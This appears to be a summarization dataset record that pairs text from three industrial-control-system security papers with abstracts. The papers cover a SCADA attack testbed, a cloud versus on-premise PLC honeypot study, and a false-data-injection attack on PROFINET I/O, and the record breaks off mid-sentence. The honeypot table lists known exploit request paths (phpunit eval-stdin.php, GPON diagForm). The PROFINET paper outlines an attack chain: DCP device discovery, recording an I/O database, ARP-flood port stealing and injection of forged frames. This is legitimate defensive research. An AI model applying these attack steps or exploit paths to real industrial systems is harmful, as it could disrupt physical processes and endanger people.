ISA-62443-1-1 security for industrial automation and control systems part 1: Terminology, c oncepts, and models draft 5, International Society for Automation, 2015. [2] NIST, 800-82, Guide to Industrial Control Systems (ICS) Security, Rev. 2, National Institute of Standards and Technology, 2015. [3] ISA-99.00.01, Security for Industrial Automation and Control Systems - Part 1: Terminology, Concepts, and Models, American National Standard. 2007. [4] FP7 CockpitCI Research Proj ect, https://www.cockpitci.eu/ [5] H2020 ATENA Research Project, https://www.atena-h2020.eu/ [6] T. Cruz, L. Rosa, J. Proenca, L. Maglaras, M. Aubigny, L. Lev, J. Jiang, P. Simoes, A cyber security dete ction framework for supervisory control and data acquisition systems, IEEE Transactions on Industrial Informatics, Preprint. doi:10.1109/TII.2016.2599841 [7] T. Cruz, J. Proen a, P. Sim es , M. Aubigny, M. Ouedraogo, A. Graziano, L. Maglaras, A Distributed IDS for Industrial Control Systems, International Journal of Cyber Warfare and Terrorism, 4(2), 1- 22, April-June 2014. DOI: 10.4018/ijcwt.2014040101 [8] C. Queiroz, A. Mahmood, J. Hu, Z. Tari, and X. Yu, Building a scada security testbed, in Network and System Security, 2009. NSS 09. Third International Conference on, pp. 357 364, IEEE, 2009. [9] M. Mallouhi, Y. Al-Nashif, D. Cox, T. Chadaga, and S. Hariri, A testbed for analyzing security of SCADA control systems (tasscs), in Innovative Smart Grid Technologies, 2011 IEEE PES, pp. 1 7, 2011. [10] S. Bhatia, N. Kush, C. Djamaludin, J. Akande, and E. Foo, Practical modbus flooding attack and detecti on, in Proceedings of the 12th Australasian Information Security Conference-Volume 149, pp. 57 65, Australian Computer Society, Inc., 2014. [11] B. Chen, N. Pattanaik, A. Goulart, K. L. Butler- Purry, and D. Kundur, Implementing attacks for modbus/TCP protocol in a real-time cyber physical system test bed, in Co mm. Quality and Reliability, 2015 IEEE International Workshop Technical Committee on, pp. 1 6, 2015 [12] E. E. Miciolino, G. Bernieri, F. Pascucci, and R. Setola, Communications network analysis in a SCADA system testbed under cyber-attacks, in Telecommunications Forum (TELFOR) 2015 23rd, pp. 341 344, 2015. [13] D. Chen, Y. Peng, and H. Wang, Dev elopment of a testbed for process control system cybersecurity research, in 3rd International Conference on Electric and Electronics, Atlantis Press, 2013. [14] R. Langner, To kill a centrifuge a tec hnical analysis of what stuxnet s creators tried to achieve, The Langner Group, November 2003. [15] Laboratory of Cryptography and Syst em Security (CrySyS), Duqu: A Stuxnet-like malware found in th e wild, http://www.crysys.hu/ publications/files/bencsathPBF11duqu.pdf. [16] Blackenergy & quedagh: the convergence of crimeware and apt attacks. ,https://www.fsecure.c om/documents/996508/1030745/blacken ergy_whitepaper.pdf. [17] Modbus Organization, Modbus protocol specification, [18] Modbus Organization, Modbus messaging on TCP/IP implementation guide [19] IM S Research, The World Market for Industrial Ethernet 2013 Edition . [20] Nmap scripting engine-modbus-discove r nse script. , https://nmap.org/ nsedoc/scripts/modbus-discover.html. [21] Mark Bristow, Modscan, https://code.google.com/archive/p/modscan/ [22] A. Gervais, Modbus/TCP library for scapy 0.1. 2017 IFIP/IEEE International Symposium on Integrated Network Management (IM2017): Experience Session - Full Paper 746 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:15 UTC from IEEE Xplore. Restrictions apply.
Summary:
As Supervisory Control and Data Acquisition (SCADA) and Industrial and Automation Control System (IACS) architectures became more open and interconnected, some of their remotely controlled processes also became more exposed to cyber threats. Aspects such as the use of mature technologies and legacy equipment or even the unforeseen consequences of bridging IACS with external networks have contributed to this situation. This situation pr ompted the involvement of governmental, industrial and research organizations, as well as standardization entities, in order to create and promote a series of recommendations and standards for IACS cyber-security. Despite those efforts, which are mostly focused on prevention and mitigation, existing literature still lacks attack descriptions that can be reused to reproduce and further research specific use cases and scenarios of security incidents, useful for improving and developing new security detect ion strategies. In this paper, we describe the implementation of a set of attacks targeting a SCADA hybrid testbed that reproduces an electrical grid for energy distribution (medium and high voltage). This environment makes use of real SCADA equipment to faithfully reproduce a real operational deployment, providing a better insight into less evident SCADA- and device- specificities.
|
Summarize:
Index Terms Industrial Control Systems, Critical National Infrastructure, Programmable Logic Controllers, Supervisory Control & Data Acquisition, Industrial Honeypot I. I NTRODUCTION Operational Technology (OT) or Industrial Control Systems (ICS) has been considered secure for decades as it has been isolated by an air gap . This air gap is the space between the control systems and the organisation managing those systems, which has been guarded by fences and locked doors [5]. However, this gap has been closed by the increased convergence between IT and OT, which exposes ICS systems to a more significant risk [1]. Looking into one of the most advanced ICS attacks, the Stuxnet worm, revealed that one of the vulnerabilities leveraged by the worm received a public patch two years before the Stuxnet attack. That vulnerability was first discovered after being exploited by another well- known worm, the Conficker worm, revealing timely patching challenges. The recent war in Ukraine and subsequent cyber attacks on critical infrastructure show that targeting ICS tend to advance in combat [16]. IT security controls come in different forms where Defence- in-Depth is considered the best practice [2]. This strategy recommends a layered approach, to slow the attacker down while buying time for defenders to detect and respond to the attack. One of the defence layers that can improve security is honeypot [4]. Honeypots are systems designed to be breached.Their single purpose is to be compromised, making every attempt to connect to them suspicious [3]. This paper will address the efficiency of honeypot deploy- ment and specifically will investigate the following aims: To summarise the limitations of existing ICS honeypot deployments. To evaluate the impact of deploying ICS honeypot in the cloud versus on-premise through the experimental investigation. The structure of this study is as follows: The discussion of the Related Work in Section II is followed by Section III, which outlines the architecture design for the experimental work. The results and discussion are given in Section IV , followed by the conclusion in Section V . II. R ELATED WORK Available literature in the field of ICS honeypots focuses on different deployment infrastructures. These include, among others, public cloud deployments of ICS honeypots [8], [9] and on-premise deployments exposed to the internet [17]. However, to the best of our knowledge, the work in the ICS honeypot field is more focused on improving the functionality and complexity of the honeypots and less so on the deception impact of the deployment location. The following section presents current work on the ICS honeypot development, focusing on the deployment location the surveyed studies have implemented. Public cloud deployments are those using public cloud providers to minimise maintenance costs. This advantage makes cloud deployment a desirable method for most re- searchers despite the deployment s discrepancy from ICS native infrastructure. L opez-Morales et al. [8] improved a Honeyd-based honeypot to achieve a medium-interaction hon- eypot. This improvement is achieved by implementing an interactive web interface, S7Comm, web and SNMP services. The implementation is deployed in the cloud, where four attacks are recorded. A hybrid ICS honeypot implementation is deployed in a hosting company by You et al. [9]. The cloud deployment is connected with an on-site deployment with physical PLCs,2023 IEEE 19th International Conference on Factory Communication Systems (WFCS) | 978-1-6654-6432-1/23/$31.00 2023 IEEE | DOI: 10.1109/WFCS57264.2023.10144119 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:29 UTC from IEEE Xplore. Restrictions apply. hence, the hybrid nature of the honeynet. The cloud front end handles a list of predefined ICS protocol requests while the back-end PLCs handle the rest, bringing novelty to the ICS honeypot development. However, this deployment fails to acknowledge that recognising a PLC honeypot by observing the cloud infrastructure is trivial. Lastly, Rashid et al. [18] propose a multi-platform honeypot, which includes a Conpot-based ICS honeypot. The experiment which is deployed in the public cloud collects a limited amount of interactions on the PLC interface which brings unconvincing results. The related work surveyed here focused on advancing the functionality and sophistication of the ICS honeypots. However, few acknowledge the deployment location role in the honeypot deception capability. Honeypot sophistication efforts bring little value without consistently deceptive deployment location, and vice versa. To the best of our knowledge, none of the present research measures the deployment affect that cloud deployment might have on the deception capability of ICS honeypots. TABLE I LITERATURE REVIEW OF EXISTING WORK IN ICS HONEYPOT DEVELOPMENT Year Title Attacks Deployment 2020 HoneyPLC: A next-generation honeypot for industrial control systems [8]Four Public cloud 2021 HoneyVP: A cost-effective hybrid honeypot architecture for industrial control systems [9]None Public cloud 2022 Faking smart industry: exploring cyber-threat landscape deploying cloud-based honeypot [18]None Public cloud 2023 This paper One On-premise In this study, we propose a novel implementation of Hon- eyPLC, which, unlike the study by L opez-Morales et al. [8], deploys HoneyPLC on a hardware device on-premise. Our improvement differs from the proposed implementations by You et al. [9] and Rashid et al. [18], deployed in the cloud. Thus, it evaluates the deployment method s role in the amount of valuable attack data attracted. Finally, this paper proposes a honeypot installation approach on a physical machine, where a more recently developed honeypot, HoneyPLC, is used. III. E XPERIMENT ARCHITECTURE An ICS honeypot covert deployment shall start with an ICS consistent deployment as suggested by the authors of Rowe et al. [6]. The election of which, if not selected well, may turn away a potential attacker before interacting with the ICS honeypot. An attacker interacting with the honeypot shall have a similar experience to a real-world ICS device [6]. The detail of the honeypot interfaces is a key to deceiving the attacker or public scanners (e.g. Shodan.io). Reconnaissance tools like Shodan, use a HoneyScore evaluation algorithm to evaluate if an internet-exposed system is a disguised honeypot. Shodanuses a proprietary algorithm to calculate a number from 0.0 to 1.0 to distinguish honeypots (when the score is close to 1.0) from genuine systems (honeyscore is close to 0.0) [6]. Shodan-identified honeypots often have Shodan-attached tags like cloud or hosting and honeypot together. The honeypot selected for this experiment is HoneyPLC, which provides medium interaction, which is more deceptive than low interaction. It also allows cost-efficient deployment on a physical machine without the unnecessary complexity of a high-interaction honeypot. The experiment s setup presented in Figure 1 comprises a physical machine running Ubuntu 18.04 LTS and HoneyPLC server in a residential building in Aarhus, Denmark. A managed switch replicates the HoneyPLC traffic and mirrors that traffic to the Logging machine . A router with a residential internet line forwards the ports of the HTTP and S7Comm services, listening on a static IP and TCP ports 80 and 102. Fig. 1. Private infrastructure deployment. An identical infrastructure is deployed in a public cloud provider in Frankfurt, Germany. This setup is implemented to create the basis for experimental evaluation to validate the efficacy of the different methods of the deployments. The main difference with the cloud setup is implementing a gateway server - a port-filtering device. A dedicated machine performs the collection to maintain data integrity. This machine logs all packets from the Hon- eyPLC. As depicted in Figure 1, a switch has been used between the HoneyPLC and the Gateway to replicate the HoneyPLC traffic. The logging machine uses Wireshark , a packet capture tool that sniffs packets transmitted or received on a network interface [10]. Once irrelevant packets are filtered, a Packet Capture (PCAP) file with internet-initiated connections is present. At this point, the PCAP file is a collection of relevant and irrelevant traffic. A method inspired by Ferretti et al. [7] is adapted to this project s needs and used to filter and analyse the traffic. The method includes: 1) Inputting raw traffic into Wireshark to filter and analyse only relevant information. 2) Identify scanners - remove duplicate IP addresses, cor- relate IP addresses with owner names using Wireshark integrated name resolution (DNS PTR records). Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:29 UTC from IEEE Xplore. Restrictions apply. 3) Manually observe and extract a list of scanner IP ad- dresses. 4) Use the generated list to filter out all packets associated with scanners and crawlers. 5) Observe the remaining traffic for attack patterns. Filter on ICS protocol: S7Comm. Data from the on-premise deployment gains meaning only when juxtaposed with the data collected from the cloud deployment. Therefore, a cloud HoneyPLC deployment is im- plemented for reference. Cloud deployment data collection and analysis are logically identical to the on-premise deployment. IV. R ESULTS AND DISCUSSION The experiment conducted was of two identical HoneyPLC deployments: one in the cloud and the second on-premise. Both deployments collected data for 65 days, from November 2022 until January 2023. Both deployments followed the instruction provided by the HoneyPLC creators [8]. The results collected are grouped based on common characteristics. The first step is to enumerate the public scanners interacting with the deployments. The public scanners often will not ac- cumulate targeted attacks but will enumerate online devices by sending requests or probes and analysing the responses. Some internet scanners might specifically look for ICS devices to inform agencies. Wireshark s built-in resolution capability was used to distinguish the internet scanners. This feature resolves IP addresses to domain names, which later can be correlated to organisations. Figure 2 depict how many unique IP addresses communicate with the cloud and on-premise deployment. It also shows how many IP addresses are associated with well- known scanners. Additionally, the table shows the top scanner organisation, Shadowserver. Fig. 2. Well-known scanners unique IP addresses Unique IP addressesTotal scanner IP addressesshadowserver.org 4,568797326 3,421807338 Cloud On-premise Geolocating the origin of traffic is sometimes helpful in tracking trends. Wireshark, MaxMind database is used to map the IP addresses with a country of origin [11]. When comparing the interest in both deployments a shift can be observed. Namely, the second most Web service-interacting country with the cloud deployment is the UK, whereas the second most Web service-interacting country with the on- premise deployment is Germany. Once exploring the ICS- interacting country measures, the source country changes to China on second place, where the USA consistently stays the country interacting the most with both deployments, regardless of the listening service. The difference in ICS interactions is observed in the third most common source country, which for cloud is the UK, and for on-premise is Portugal. IP addressoriginating from any specific country does not mean that the interaction origin is from that country, as devices in foreign countries can be compromised and later used as proxies to hide the origin. The experiment exposed two services each: HTTP and S7Comm. HTTP is a common service traditionally deployed both in the cloud and on-premise. However, S7Comm is the service associated with ICS devices which is the honey to this honeypot. Table II depicts the number of unique IP addresses interacting with both services and which of those did not belong to scanners. The ICS-related traffic is filtered by protocol: S7Comm. Table II depicts the number of exploit attempts and the number of scanners and non-scanners IP addresses interacting with the S7Comm protocol. Even though the S7Comm interactions amount was significantly smaller than the HTTP interactions, the recorded activity is more relevant to the ICS device. This activity is directly linked with ICS interest which means it can be used to measure ICS deception effectiveness. The on-premise deployment attracts multiple attacks originating from a single IP address, indicat- ing the deception advantage of the deployment. Attacks in this study are the requests for PLC memory Read, Stop and Start commands. The PLC Stop and Start commands are considered attacks as they can potentially impact the availability of the PLC - an attack type called a Denial of Service attack. The PLC memory Read requests is an activity seen in the reconnaissance phase of an attack. TABLE II HTTP AND S7C OMM INTERACTIONS WITH CLOUD AND ON -PREMISE DEPLOYMENT HTTP - unique IP addr.HTTP - non- scanner IP addr.HTTP - unique exploit interac- tionsS7Comm - unique IP addr.S7Comm IP addr. - non- scanner inter- actionsPLC inter- ac- tions (at- tacks) On- premise1488 1199 501 154 53 116 (28) Cloud 2054 1790 1810 144 70 80 (0) Table II depicts that the HTTP service attracts more atten- tion to cloud deployment. The number of unique IP addresses and even non-scanner addresses that interact with the cloud deployment almost doubles. In addition, the number of HTTP unique exploit interactions is triple on the cloud deployment. However, when performing the deep analysis in the following part, it becomes evident that those HTTP interactions are irrelevant to the ICS device. When observing the interactions with the S7Comm service, an interaction shift is observed from the cloud towards on- premise. The on-premise deployment attracts more unique IP addresses than the cloud deployment, which send PLC memory read or PLC Stop and Start requests which are also considered malicious. There were two compelling types of interactions observed in the results. First, the HTTP exploit interactions. Those in- Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:29 UTC from IEEE Xplore. Restrictions apply. TABLE III RECORDED HTTP EXPLOIT ATTEMPTS AGAINST CLOUD AND ON -PREMISE DEPLOYMENT Malicious URL Exploit description Reference /boaform/admin/ formLo- ginFiber Optic Routers ex- ploit[12] /vendor/phpunit/ phpunit/src/Util/ PHP/eval-stdin.phpPHP exploit - Remote Code Execution[13] /Autodiscover/ Autodiscover.xmlOutlook Web App that has autodiscover enabled ex- ploit[14] /GponForm/diag Form ?images/Vulnerability in GPON home routers exploit[15] teractions were coming from devices that attempted to exploit known vulnerabilities in systems that are publicly exposed. Table III lists the HTTP exploits attempted against both the cloud and the on-premise deployments. None of the observed exploit attempts succeeded as they would work with different types of destinations. It is hard to say why was the cloud deployment exposed to more exploit attempts. One possible explanation is that web applications like Citrix, WordPress, Apache and Outlook are often deployed in the cloud, making adversaries look for them in the cloud. Other irrelevant exploit attempts were recorded. For exam- ple, it is unclear why an exploit of a Fiber Optic Router or GPON router, as shown in Table III, was attempted against the cloud. GPON routers are typically residential devices. One possible explanation is that the exploit traffic was generated by worms looking for vulnerable devices. Even though these interactions provide some intelligence into what vulnerabilities are exploited in the wild, it is of little value for an ICS/OT- specific threat intelligence. Analysing the HTTP service interaction, the attacks yield IT-relevant results which are not ICS related. The S7Comm protocol offers specific ICS-related results. Only 10% of the unique IP addresses interacted with S7Comm, as shown in Table II. On a closer look, this traffic is formed of recon- naissance activities that read the PLC memory blocks. These readings can be used to understand the present logic running on the PLC. Such information can be used further to help adversaries to develop an exploit. The observed interactions with the ICS protocol provide valuable intelligence for the parties that studied the ICS de- ployments. Furthermore, a PLC Stop and Start attempt shows that the on-premise deployment deceives an adversary. Payload deployment has not been observed (Ladder Logic Capture), and no ICS-targeted HTTP exploitation has been observed. V. C ONCLUSION This study has proposed a deployment shift of ICS honey- pots from the cloud to on-premise, arguing that on-premise and physical deployments collect more relevant data than their cloud counterparts. The signs of inefficient ICS honeypot deployments are data that is not actionable. The experiment evaluates the deployment effects of ICS honeypots by runninga 65-day internet exposure and data collection. The exper- iment includes comparing a medium-interaction honeypot, HoneyPLC, deployed in two different environments: cloud and on-site. The paper demonstrates that ICS honeypots will inevitably attract mainly unrelated web application-specific or scanner traffic. Based on the observed results, such honeypots will often collect irrelevant data. However, the on-premise deployment attracts multiple attacks. This finding informs the future development of the current work in progress to validate the deployment impact on deception capability. This validation shall be achieved by adding a third experiment deployment - a physical PLC to serve as a control group for the expected interactions. Based on these conclusions, practitioners shall consider ICS honeypot deployment on-premise as it mimics the expected infrastructure of ICS systems. ACKNOWLEDGMENT This research is supported by the School of Computing, Engineering & the Built Environment at Edinburgh Napier University.
Summary:
The Industrial Control System (ICS) industry faces an ever-growing number of cyber threats defence against which can be strengthened using honeypots. As the systems they mimic, ICS honeypots shall be deployed in a similar context to field ICS systems. This ICS context demands a novel honeypot deployment process, that is more consistent with real ICS systems. State-of- the-art ICS honeypots mainly focus on deployments in cloud environments which could divulge the true intent to cautious adversaries. This experimental research project addresses this limitation by evaluating the deception capability of a public cloud and an on-premise deployment. Results from a 65-day, HoneyPLC experiment show that the on-premise deployment attracts more Denial of Service and Reconnaissance ICS attacks. The results guide future researchers that an on-premise deploy- ment might be more convincing and attract more ICS-relevant interactions.
|
Summarize:
Index Terms Industrial Control Systems, False Data Injection Attack, I/O Database, PROFINET I/O Systems; I. I NTRODUCTION Industrial Control Systems (ICSs) are used to automate critical control processes such as production lines, electrical power grids, gas plants and others. In the past, security means in ICSs were mostly achieved through isolation based on the control of physical access. But currently, the Ethernet and the IP protocol stack are becoming the main part of any plant and factory network. So as a consequence, thousands of ICS components e.g. PLCs are directly reachable from the internet [1], [2]. Although only one PLC may be reachable from outside, this exposed PLC is likely to be connected to internal networks e.g via PROFINET with many more PLCs. This is what is called the deep industrial network. Therefore attackers can leverage an exposed PLC to extend their access from the internet to the deep industrial network. Another true fact was pointed out in [3]. The report showed that many devices are exposed to the internet without any security in mind, as well as many ICS operators have lack of knowledgeof how to secure their devices within their own operations, or organizations may know, but are may not perceive the potential risk costing more than the mitigation. We totally agree with these previous reports that many manufactures are still not willing to secure their industries unless they are speci cally told to do so, or they will often perform security upgrades only if it is absolutely necessary i.e. if something severe occurred. Modern ICS components are increasingly connected over PROFINET I/O communication to exchange data between the controllers and other industrial devices. This concept is based on the Ethernet standard that was given by IEEE 802.3 (Industrial of Electrical and Electronics Engineers), and allows the connected stations to establish and maintain connectiv- ity through three different channels: Real-Time (RT), Non- Real-Time (NRT), and Isochronous Real-Time (IRT). These channels coexist in Application Relation (AR) between nodes, and satisfy all the requirements for industrial automation. Although integrating PROFINET I/O with ICSs provides a better network connectivity and a more streamlined control process, it also comes with its own security challenges. This is due to the fact that PROFINET I/O nodes do not have any endpoint security functionality, which makes them exposed to a variety of attacks such as man-in-the-middle (MITM), denial of service (DoS), replay attack, false data injection (FDI), etc. once a malicious adversary gets access to a target device or its network. One of the well-known vulnerabilities that might compro- mise the communication integrity of PROFINET I/O sys- tems are improper/fake sensor readings or actuator values exchanged between the connected stations i.e. between IO- Controllers, IO-Devices, and IO-Supervisor. These threats are known as deception attacks [4] or false data injection (FDI) in the IT world and occur when the physical values of a hardware device are manipulated by sending fake values or signals to the victim device. Such threats are very severe because programmable logic controllers (PLCs) keenly rely on reading accurate sensor measurements to safely control critical processes in real time, and any successful FDI attack might eventually cause a signi cant damage on the infected system. In PROFINET I/O systems using real time channels, the nodes normally exchange I/O process data through speci c frames namely PROFINET I/O Real Time (PNIO-RT) frames see gure 1. These frames have xed structure features e.g. packet size, packet type, frame identi er, data size, etc. The 978-1-7281-9023-5/21/$31.00 2021 IEEE2021 IEEE 30th International Symposium on Industrial Electronics (ISIE) | 978-1-7281-9023-5/21/$31.00 2021 IEEE | DOI: 10.1109/ISIE45552.2021.9576496 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:02 UTC from IEEE Xplore. Restrictions apply. RT data eld in each PNIO-RT frame contains the bytes that represent either sensor measurements or actuator values depending on the transaction direction between the nodes e.g. from IO-Controllers to IO-Devices for actuator values, and from IO-Devices to IO-Controllers for sensor measurements. Fig. 1: Ethernet message structure The approach we take in this paper is to manipulate these bytes by performing an FDI attack scenario without any prior knowledge of the target system, the data exchanged between stations, the physical process, or even the system parameters. For achieving this, we introduce a new attack approach based on integrating an I/O Database during the exploit scenario. This method is based on collecting network captures that contain actual sensor and output values from the target system (prior to launch our FDI attack) which allows the attacker to interrupt, compare, and then replace the correct I/O process data with false one from the I/O database. This technique does not require from the adversary to map the I/O data bytes to its readable version as most of the previous works assumed e.g. [16] which is, in our opinion, not practical as the attacker is not familiar with the system he aims to exploit. However, our new approach is more realistic and easy to implement as we use a simple Python script based on Scapy to lter, extract and store the PNIO-RT frames in the I/O Database. Our full attack-chain consists of two main phases: Of ine: this includes snif ng and collecting data prior to our attack. Online: injecting and forwarding false data to the victims in real time. This work is summarized as follows: we discover all PROFINET I/O enabled devices in the network using our PN-IO DCP (Discovery and Con guration Protocol) scanner. Then we create an I/O database by collecting multiple network captures from the target system, and processing each network capture by extracting and grouping the PNIO-RT frames in inputs/outputs pair. Afterwards we compromise the trust con- nection between the PROFINET I/O stations by implementing MITM attack based on port stealing. Finally, we inject false data in the network based on our I/O database see section IV . Please note that in this work, we are only interested in compromising the deep network i.e. having access to the ICS network from outside is out of the scope of this work and can be achieved via typical attack vectors in our IT world such as infected USB, vulnerable web server, etc. Our fullattack-chain is implemented on a real industrial setting using an S7-300 PLC as IO-Controller, and an S7 CP 343-1 Lean as IO-Device. The rest of the paper is organized as follows. We compare our work with related ones in section II. Section III gives an overview of our experimental setup, and our attack is illustrated in IV . We discuss the results of our new approach in V , and nally conclude the paper in VI. II. R ELATED WORK In the recent years, many previous efforts [5] [15] discussed that sensors on a eld bus network send information to the PLC where it is used as an input into the control program, and showed that if the data was modi ed or inserted, the PLC reads consequently incorrect information and makes wrong decisions that effect on the physical process. In a similar vein, output data could be manipulated or inserted between the PLC and the controlled device causing a similar situation. All the above works were done on eld-bus communications based on MODBUS and/or Ethernet protocols assuming that an attacker is familiar beforehand with the target system, and has a prior knowledge of the system parameters. However, this strong assumption makes their attacks hard to be implemented for a practical scenario in the real world. Opposed to their works, we present in this paper a real-time false data injection attack that is implemented on PROFINET I/O eld-bus protocol and that does not require from the adversary to be familiar with neither the physical process nor the data packets exchanged between the stations. The port stealing approach is widely used in compromising PROFINET I/O systems. As an earlier attempt to inject false data into PLCs through port stealing is presented in [17]. The authors showed that it is possible to attack and gain control over PROFINET I/O nodes. However, their approach was not implemented on a real hardware. Another research group managed to exploit the vulnerability of the PROFINET Discovery and Basic Con guration Protocol (DCP) [18]. They performed Denial of Service (DoS) attacks through port stealing against the application relation (AR) between the IO-Controller and the IO-Device. Their attack aimed only at breaking the trust relation between PROFINET stations, and was not designed to inject fake data after stealing the port like ours does. The authors of [19] described also a false data injection attack via the port stealing technique on PROFINET IO-Controllers. They managed to set up an AR with the IO-Controller and send fake input data by crafting DCP identify responses. Their attack was detectable and could be exploited only in the set up process and had no in uence on the availability of the automation system during operation. Our work differs in that after implementing the port stealing attack, we replace the correct data with false one based on utilizing an I/O Database that contains already collected data from previous network captures. This makes our method hard to detect as we use the same data that the stations exchanged. In [20] a paper presented a signature-based IDS for industrial control systems. As motivation for this IDS, an attack aiming to disturb a stepping motor with no knowledge about the Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:02 UTC from IEEE Xplore. Restrictions apply. Fig. 2: Experimental Set-up industrial process was performed. The authors focused on replaying sniffed network packets to achieve a successful attack based on the port stealing technique. We believe that the attack scenario described in their paper is not feasible for a real setup, as well as the authors did not describe clearly how they managed to capture the packets between the motor and the PLC to replay the traf c back. In 2021, a recent published paper [16] implemented a false data injection against a PROFINET I/O system. They showed that an attacker can sniff and manipulate the data exchanged after stealing the port from the IO-Controller. The authors assumed that the attacker has a previous knowledge of the physical process and the control system. Therefore he can map the raw I/O data to the actual sensor readings. We believe that this given assumption makes their work also not practical for a real scenario as the attacker is not supposed to be familiar with the target system in advance. III. EXPERIMENTAL SET-UP In this section, we describe our experimental set-up used to test our attack scenario presented in this paper. As shown in gure 21there are two aquariums lled with water that is pumped from one to the other until a certain level is reached and then the pumping direction is inverted. The entire system is controlled by a PLC (S7-315 2 PN/DP) which is connected 1please note that we are using these industrial settings also in experiments run in our earlier publications [23], [24], [25]to a remote I/O module using PROFINET I/O standard and exchanging data cyclically (sensor and actuator values) over the network via industrial Ethernet communication processor IE-CP. The physical process is monitored by the TIA Portal software installed on the engineering station which is here a normal PC. However, in our example application we have three stations. In the rst station, an S7 315-2 PN/DP CPU was set as IO-Controller. The second station is the IO-Device. it consists of an S7 315 DP CPU and a communication processor CP 343-1 Lean. this station is connected directly to an external I/O module which is attached to the inputs and outputs hardware i.e. the two pumps and the four digital sensors as shown in gure 2. Both stations are exchanging input and output data cyclically in real time using the PROFINET I/O protocol. The third station is the IO-Supervisor which represents the engineering station in this example, and all the three stations are connected to a 100 Mbit/s industrial switch. IV. A TTACK DESCRIPTION Figure 3 shows an overview of the attack scenarios we perform to inject false data in the network traf c exchanged between the PROFINET I/O nodes. To achieve a fully blind FDI attack scenario, we need rst to discover the network topology of the target PROFINET I/O system, and then collect PNIO-RT packets from the traf c to create our I/O database that contains actual sensor and actuator values. However, these two steps are done prior to our injection attack. After Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:02 UTC from IEEE Xplore. Restrictions apply. Fig. 3: High-level overview of our false data injection attack: scenario 1 manipulating senor data upper part of the gure; scenario 2 manipulating control commands lower part of the gure collecting the needed data from the target, we start our main attack by stealing the port from the nodes and send false data packets to the victim devices using our I/O database created earlier. In the following we illustrate the two phases of our full attack-chain in detail. A. Pre-Attack Phase (Of ine) Here, the attacker aims to get an overview of the network and the devices roles that are connected in the target system as a rst step, and then to sniff and to collect data packets that the stations exchange cyclically over the PROFINET I/O frames. 1) Discovering the Network Topology: For obtaining all the required information about the target system for our attack, we use a PN-IO DCP scanner introduced in our paper [23]. Our scanner is a python script based on Scapy, and sends a DCP identify request via multicast to the network. Each connected device returns its identifying parameters. Table 1 shows information gathered about all PROFINET-enabled devices such as names, MAC addresses, IP addresses, vendors, etc. For our example, our scanner managed to nd two devices available. The rst node is an IO-Controller located at the IP address 192.168.0.1 using the MAC address 00:1b:1b:23:fb:fe, whereas the second one is an IO-Device located at the IP address 192.168.0.2 using the MAC address 20:87:56:05:06:15 to connect with the other station. 2) Snif ng and Collecting Data: After discovering and determining the role of each device in our PROFINET I/O system, the next step is to collect sensor and actuator values. To create an I/O Database, we rst sniff and record the entire network stream between the stations using a snif ng network software e.g. Wireshark. The nodes exchange I/O process data through PNIO-RT frames, precisely class 1 (RTC1) frames see gure 4. These frames have the same structure features which make them easy toTABLE I: Output of executing our PN-IO DCP scanner Parameter Device 1 Device 2 MAC Address 00:1b:1b:23:fb:fe 20:87:56:05:06:15 Device ID 257 515 Device Role IO Controller IO Device Device vendor b S7-300 b S7-300 CP IP Address 192.168.0.1 192.168.0.2 Network Mask 255.255.255.0 255.255.255.0 Vendor ID 42 42 be recognized and extracted out during an ongoing network traf c. Fig. 4: PROFINET I/O Real Time frame structure As shown in gure 5, For collecting a suf cient number of sensor measurements and actuator values, the snif ng process should last for a reasonably long period of time e.g. in this work, we sniff the network for approx. 30 minutes. Then the stream captured is ltered to retrieve the PNIO-RT frames only using the unique packet type (0x8892) and frame ID (0x80xx) bytecode. According to our prior knowledge to the devices roles (from the previous step), we can check the source and destination MAC addresses of each PNIO-RT frame and group the captured frames into a pair of Pcap les (sensor data and control command les) accordingly. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:02 UTC from IEEE Xplore. Restrictions apply. Fig. 5: Scheme of creating I/O Database To quicken the comparison process during our injection, we need to remove the duplicate packets received during the snif ng period i.e. those containing similar I/O data for each Pcap le, keeping only the packets that differ from each in the I/O process data bytes. This is done by comparing the I/O data bytes of each PNIO-RT frame to the one of the other frames using byte comparison tools (Burp Suite Comparator2). Please note that the location of I/O data bytes is always static in PNIO-RT frames of the same size e.g. for our example application, the nodes exchange PNIO-RT frames of a size of 60 bytes, and the I/O data bytes are located between the byte number 17 and 56 as shown in gure 4. For our example application given in section III, we man- aged to create an I/O Database containing 7 sensor reading frames as inputs, and 2 actuator value frames as outputs. It s worth mentioning that pairing the captured frames in our I/O database into inputs and outputs Pcap les, helps the attacker to compare and replace the I/O data bytes with false ones online, and to win the strict race condition that PROFINET I/O nodes must meet (as illustrated in the next subsection), before he replies his forged PNIO-RT packets to the network. B. Attack Phase (Online) In this phase, false data is injected in the network traf c based on our I/O database approach. 1) Port Stealing Approach: Before pushing incorrect data in the network, we need rst to interrupt the Application Relation (AR) between the IO- Controller and the IO-Device. Technically, a typical industrial Ethernet switch controls and manages the binding of each MAC address to a certain switch port in an Address Resolution Protocol (ARP) mapping table. 2https://portswigger.net/burpOnce the MAC address at any port changes because a new device has been added to the network, the switch updates its mapping table and the old entry is removed. Therefore, we just need to ood the switch with forged gratuitous ARP packets registering the attacker s MAC address in place of the victim host to achieve a successful port stealing as shown in gure 6. This technique is widely used in MITM attacks in Fig. 6: Data exchange con guration after ARP Poisoning attack: Scenario 1 stealing the port from the IO-Controller; Scenario 2 stealing the port from the IO-Device Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:02 UTC from IEEE Xplore. Restrictions apply. traditional IT switched networks, where the switch assumes that the victim device is now using another switch port and forwards the packets to the new port. It is worth mentioning that this attack has a challenge. The frequency of sending ARP packets to the victim must be suf cient. Meaning that if the target device sends ARP packets before the attacker, the switch always updates the binding of the port to the victim MAC address back and forth. To overcome this issue, it is required from the attacker to send ARP packets at a much higher frequency than the victim does. However, in our work a frequency up to 1 ms was suf cient to prevent the switch from updating its mapping table. Now if the packets of two devices are redirected through port stealing to the attacker, he just needs to forward the 